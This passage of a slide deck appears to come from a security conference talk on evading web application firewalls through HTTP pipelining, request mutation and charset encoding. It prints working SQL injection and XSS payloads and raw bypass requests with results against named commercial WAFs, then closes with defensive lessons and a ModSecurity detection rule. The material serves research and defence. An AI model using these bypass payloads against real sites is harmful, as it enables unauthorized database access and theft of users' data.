  • 15. HTTP Pipelining Example 2 - Request
  • 16. HTTP Pipelining – Burp Suite No “Accept-Encoding” to get text, CRLF in the end, mind the “Connection” header
  • 17. HTTP Pipelining + HTTP 0.9 Example 1 “admin” is blocked in the path • HTTP 0.9 has not been disabled • URL encoding and normal HTTP pipelining cannot bypass it (super secure stuff!) • Directory traversal techniques e.g. “/foo/../admin” will not help
  • 18. HTTP Pipelining + HTTP 0.9 Example 2 Abusing Apache Tomcat full header support • Burp Suite adds an additional spacing • CR (0x0D) can be used instead of CR+LF (0x0D+0x0A)
  • 19. HTTP Pipelining – Python DIY • https://github.com/irsdl/httpninja/blob/master/Generic%20Codes/web_request_socket.py req1_http_1_1 = RequestObject('GET', 'http://asitename.com:8080/sum.jsp?a=1&b=1&c=2&d=2') req2_http_1_0 = RequestObject('POST', 'http://asitename.com:8080/sum.jsp?a=3&b=3', 'c=4&d=4', {'Content-Type': 'application/x-www-form-urlencoded', 'Content-Length': '7'}, autoContentLength=False, HTTPVersion="HTTP/1.0") req3_http_0_9 = RequestObject('POST', 'http://asitename.com:8080/sum.jsp?a=5&b=5', 'c=6&d=6', {'Content-Type': 'application/x-www-form-urlencoded'}, autoContentLength=True, HTTPVersion="") joinedReqs = [req1_http_1_1, req2_http_1_0, req3_http_0_9] pipelineResult = RequestObjectsToHTTPPipeline(joinedReqs) print pipelineResult print SendHTTPRequestBySocket(pipelineResult, req1_http_1_1.targetName, req1_http_1_1.targetPort)
  • 21. Request Mutation Category Using known & unknowns features! • Requires lots of test-cases, fuzzing, behaviour analysis • Depends on the environment • web servers, web handlers, proxies, etc. • Examples: • Duplicate parameters (HPP) • Path or parameters Evasion • Misshaped Requests
  • 22. Features from RFC Should be known by WAFs… (hopefully by all of them) • Read the boring RFC • Always look for changes in different RFCs • Possible canonical issues • Look for vague statements, "RECOMMENDED", "MAY", and "OPTIONAL“ • e.g.: Line folding in headers (obsoleted by rfc7230) • Multiline headers, starts with CR/LF followed by a horizontal tab or space character! • Example: I’ve used in the past to bypass filtering (not a WAF though) GET /page.do?p1=v1 HTTP/1.1 Host: www.filtered.com
  • 23. Custom Implementation The ones that can actually make a WAF bleed! • Fuzzing is the key • Not standards and are technology specific • Examples: • Parameter blacklist bypass - Python Django • & == ; • Payload bypass - IIS, ASP Classic • <script> == <%s%cr%u0131pt> • Path blacklist bypass - Apache Tomcat • /path1/path2/ == ;/path1;foo/path2;bar/;
  • 24. Content Encoding Abusing the power of “charset” encoding • Can be used in requests not just responses • Useful for ASCII characters • Might corrupt Unicode • Useful for server-side issues • Not possible to use it normally via a browser • Examples: • application/x-www-form-urlencoded;charset=ibm037 • multipart/form-data; charset=ibm037,boundary=blah • multipart/form-data; boundary=blah ; charset=ibm037
  • 25. Request Encoding is Challenging Implemented differently • All at least supports IBM037, IBM500, cp875, and IBM1026 (all very similar) Target QueryString POST Body & and = URL-encoding Nginx, uWSGI - Django - Python3 ✔ ✔ ✔ ❌ Nginx, uWSGI - Django - Python2 ✔ ✔ ❌ ✔ (sometimes required) Apache Tomcat - JSP ❌ ✔ ❌ ✔ (sometimes required) IIS - ASPX (v4.x) ✔ ✔ ❌ ✔ (optional) IIS - ASP classic ❌ ❌ Apache/IIS - PHP ❌ ❌
  • 26. Encoding/Conversion • Similar to a substitution ciphers • Payload: • <script> • IBM037/IBM500/cp875/IBM1026 URL-encoded: • L%A2%83%99%89%97%A3n • Simple Python code: import urllib s = 'Payload Here' print urllib.quote_plus(s.encode("IBM037"))
  • 27. Automating Request Encoding Burp Suite HTTP Smuggler https://github.com/nccgroup/BurpSuiteHTTPSmuggler • Supports request encoding • More to come
  • 30. ASP.NET Request Validation Bypass 1/5 AntiXSS bypass, limits: • “On error resume next” – or – an empty “catch” around the first read • Ignores the first use (sees an empty string) • Can target GET or POST not both at the same time
  • 31. ASP.NET Request Validation Bypass 2/5 Useful for: • Stored XSS • Validation bypass if (time-of-check time-of-use issue) • It validates an input parameter and an empty string is Ok to go through! • It reads the same input parameter again from GET or POST The twist: • When payload is in QueryString, method should be POST • When payload is in the body, method should be GET (keep the content-type header)
  • 32. ASP.NET Request Validation Bypass 3/5 Exploiting XSS in the POST body as an example: post_param_1=<script>alert(000)</script>&post_param_2=<script>alert(111)</script>
  • 33. ASP.NET Request Validation Bypass 4/5 SQL injection when single quote is not allowed! Using encoding payload would be: ?uid=<foobar>'union all select password from users where uid='admin
  • 34. ASP.NET Request Validation Bypass 5/5 ?uid=<foobar>'union all select password from users where uid='admin
  • 35. How to Stop Request Encoding? Write a new rule • ModSecurity when only “charset=utf-8” is allowed: SecRule REQUEST_HEADERS:Content-Type "@rx (?i)charsets*=s*(?!utf-8)" "id:'1313371',phase:1,t:none,deny,log,msg:'Invalid charset not allowed', logdata:'%{MATCHED_VAR}'" • Incapsula: Content-Type contains "charset" & Content-Type not-contains "charset=utf-8"
  • 36. Test Case Walkthrough Today’s Test Case: IIS 10 ASPX (v4)
  • 37. Today’s Test Case: IIS 10 ASPX (v4) 5 Simple Steps: 1. HTTP verb replacement 2. Changing body type 3. Removing unnecessary parts 4. Adding unused parts 5. Changing request encoding
  • 38. Step 1 – HTTP Verb Replacement • Replacing POST with GET • Works on: • IIS (tested on ASP classic, ASPX, PHP) • Keep the “content-type” header
  • 39. Request A – Obviously Bad (SQLi Payload) POST /path/sample.aspx?input0=0 HTTP/1.1 HOST: victim.com Content-Type: application/x-www-form-urlencoded Content-Length: 41 input1='union all select * from users-- Cloudflare ❌ Incapsula ❌ Akamai ❌
  • 40. Request A1 GET /path/sample.aspx?input0=0 HTTP/1.1 HOST: victim.com Content-Type: application/x-www-form-urlencoded Content-Length: 41 input1='union all select * from users-- Cloudflare ❌ Incapsula ❌ Akamai ❌
  • 41. Step 2 – Changing Body Type • File uploads also use “multipart/form-data” • Works on: • Nginx,uWSGI-Django-Python3 • Nginx,uWSGI-Django-Python2 • Apache-PHP5(mod_php) • Apache-PHP5(FastCGI) • IIS (ASPX, PHP)
  • 42. Request A1 GET /path/sample.aspx?input0=0 HTTP/1.1 HOST: victim.com Content-Type: application/x-www-form-urlencoded Content-Length: 41 input1='union all select * from users-- Cloudflare ❌ Incapsula ❌ Akamai ❌
  • 43. Request A2 GET /path/sample.aspx?input0=0 HTTP/1.1 HOST: victim.com Content-Type: multipart/form-data; boundary=--1 Content-Length: [length of body] ----1 Content-Disposition: form-data; name="input1" 'union all select * from users-- ----1-- Cloudflare ❌ Incapsula ❌ Akamai ❌
  • 44. Step 3 – Removing Unnecessary Parts • What if we remove some parts of the body? • Might not be useful if misshaped requests are detected • Removing last “--” in the boundary: • Nginx,uWSGI-Django-Python 2 & 3 • Apache-PHP5(mod_php & FastCGI) • IIS (ASPX, PHP) • Removing “form-data;” from the multipart request: • Apache-PHP5(mod_php & FastCGI) • IIS (ASPX, PHP)
  • 45. Request A2 GET /path/sample.aspx?input0=0 HTTP/1.1 HOST: victim.com Content-Type: multipart/form-data; boundary=--1 Content-Length: [length of body] ----1 Content-Disposition: form-data; name="input1" 'union all select * from users-- ----1-- Cloudflare ❌ Incapsula ❌ Akamai ❌
  • 46. Request A3 GET /path/sample.aspx?input0=0 HTTP/1.1 HOST: victim.com Content-Type: multipart/form-data; boundary=1 Content-Length: [length of body] --1 Content-Disposition: name="input1" 'union all select * from users-- --1 Cloudflare ✔ Incapsula ❌ Akamai ✔
  • 47. Step 4 – Adding Unused Parts • What if we add some confusing parts? • Additional headers • Duplicated values • Useless stuffs, who cares? • can be useful too • Spacing CR LF after “Content-Disposition:” and before the space • PHP  ASPX 
  • 48. Request A3 GET /path/sample.aspx?input0=0 HTTP/1.1 HOST: victim.com Content-Type: multipart/form-data; boundary=1 Content-Length: [length of body] --1 Content-Disposition: name="input1" 'union all select * from users-- --1 Cloudflare ✔ Incapsula ❌ Akamai ✔
  • 49. Request A4 GET /path/sample.aspx?input0=0 HTTP/1.1 HOST: victim.com Content-Type: multipart/form-data; boundary=1,boundary=irsdl Content-Length: [length of body] --1 --1-- --1;--1;header Content-Disposition: name="input1"; filename ="test.jpg" 'union all select * from users-- --1 Cloudflare ✔ Incapsula ✔ Akamai ✔ Space characters
  • 50. What If, Step 2  Step 4 Now that everything has been bypassed… Jumping from Step 2 (Changing body type) to Step 4 (Adding unused parts)
  • 51. Flashback: Request A2 GET /path/sample.aspx?input0=0 HTTP/1.1 HOST: victim.com Content-Type: multipart/form-data; boundary=--1 Content-Length: [length of body] ----1 Content-Disposition: form-data; name="input1" 'union all select * from users-- ----1-- Cloudflare ❌ Incapsula ❌ Akamai ❌
  • 52. Request A4+ GET /path/sample.aspx?input0=0 HTTP/1.1 HOST: victim.com Content-Type: multipart/form-data; boundary=--1,boundary=irsdl Content-Length: [length of body] ----1 ----1-- ----1;----1;header Content-Disposition: form-data; name="input1"; filename ="test.jpg" 'union all select * from users-- ----1-- Cloudflare ❌ Incapsula ✔ Akamai ✔ Space characters
  • 53. Step 5 – Changing Request Encoding • This can bypass most WAFs on its own • What if it detects the “charset”? • Perhaps use “,” rather than “;” for ASPX, or duplicate it, or add additional ignored strings… “application/x-www-form-urlencoded, foobar charset=ibm500 ; charset=utf-8” • Charset value can be quoted too “application/x-www-form-urlencoded, foobar charset="ibm500" ; charset=utf-8”
  • 54. Request A4 GET /path/sample.aspx?input0=0 HTTP/1.1 HOST: victim.com Content-Type: multipart/form-data; boundary=1,boundary=irsdl Content-Length: [length of body] --1 --1-- --1;--1;header Content-Disposition: name="input1"; filename ="test.jpg" 'union all select * from users-- --1 Cloudflare ✔ Incapsula ✔ Akamai ✔
  • 55. Remember Request A? POST /path/sample.aspx?input0=0 HTTP/1.1 HOST: victim.com Content-Type: application/x-www-form-urlencoded Content-Length: 41 input1='union all select * from users--
  • 56. Request B GET /path/sample.aspx?%89%95%97%A4%A3%F0=%F0 HTTP/1.1 HOST: victim.com Content-Type: multipart/form-data, foobar charset=ibm500 ;charset=utf-8 ; boundary=1,boundary=irsdl Content-Length: 129 --1 --1-- --1;--1;header Ö•£…•£`ĉ¢—–¢‰£‰–•z@••”…~•‰•—¤£ñ•^@†‰“…••”…@@@~•£…¢£K‘—‡• }¤•‰–•@•““@¢…“…ƒ£@@†™–”@¤¢…™¢`` --1 Cloudflare ✔ Incapsula ✔ Akamai ✔
  • 57. Lesson Learned There is always a bypass but at least make it harder • Do not rely only on cloud based WAFs when IP address can be used directly • Do not support HTTP 0.9 – disable it wherever you have a choice • Only accept known charset on incoming requests • Discard malformed HTTP requests • Train the WAF and use whitelists rather than blacklists Whitelist legitimate testers’ IP address during your assessment • But remember to remove the rules afterwards
  • 58. Thank you! Soroush Dalili (@irsdl), NCC Group (@NCCGroupInfosec)
  • 59. References 1/2 • http://www.cgisecurity.com/lib/HTTP-Request-Smuggling.pdf • http://www.ussrback.com/docs/papers/IDS/whiskerids.html • https://media.defcon.org/DEF%20CON%2024/DEF%20CON%2024%20presentations/DEFCON- 24-Regilero-Hiding-Wookiees-In-Http.pdf • https://securityvulns.ru/advisories/content.asp • https://dl.packetstormsecurity.net/papers/general/whitepaper_httpresponse.pdf • https://cdivilly.wordpress.com/2011/04/22/java-servlets-uri-parameters/ • https://msdn.microsoft.com/en-us/library/system.text.encodinginfo.getencoding.aspx • http://securitee.org/files/cloudpiercer_ccs2015.pdf • https://www.nccgroup.trust/uk/about-us/newsroom-and-events/blogs/2017/august/request- encoding-to-bypass-web-application-firewalls/
  • 60. References 2/2 • https://www.nccgroup.trust/uk/about-us/newsroom-and-events/blogs/2017/september/rare-aspnet- request-validation-bypass-using-request-encoding/ • https://www.rootusers.com/find-the-ip-address-of-a-website-behind-cloudflare/ • https://www.ericzhang.me/resolve-cloudflare-ip-leakage/ • https://community.akamai.com/community/web-performance/blog/2015/03/31/using-akamai- pragma-headers-to-investigate-or-troubleshoot-akamai-content-delivery • https://soroush.secproject.com/blog/2010/08/noscript-new-bypass-method-by-unicode-in-asp/ • https://0x09al.github.io/waf/bypass/ssl/2018/07/02/web-application-firewall-bypass.html

Editor's Notes

  • #22: Here is the other bypass category that I’m going to talk about today that is more interesting from my point of view